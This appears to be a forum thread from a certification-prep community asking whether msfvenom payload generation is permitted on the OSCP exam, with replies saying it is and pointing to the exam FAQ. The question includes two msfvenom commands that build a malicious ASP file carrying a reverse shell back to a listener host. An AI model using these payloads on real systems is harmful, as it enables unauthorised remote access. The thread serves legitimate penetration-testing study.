Home
Certification Preparation
Other Security Certifications
msfvenom ok for oscp exam?
mabraFoo
I know you can't use metasploit for every machine on the oscp exam, but what about msfvenom? If I create a malicious asp file like this, is that considered using metasploit?
msfvenom -p windows/meterpreter/reverse_tcp -a x86 lhost=192.168.2.2 lport=4444 -f asp > /tmp/evil.asp
What about this? (shell_reverse_tcp)
msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.2.2 lport=4444 -f asp > /tmp/evil.asp
Find more posts tagged with
Comments
invictus_123
both of those are fine.
Please re read the exam faq, it tells exactly what is and is not allowed
eth0
mabraFoo
wrote:
»
If I create a malicious asp file like this, is that considered using metasploit?
No, you can do it for all and you should read exam FAQ
.
Quick Links
All Categories
Recent Posts
Activity
Unanswered
Groups
Best Of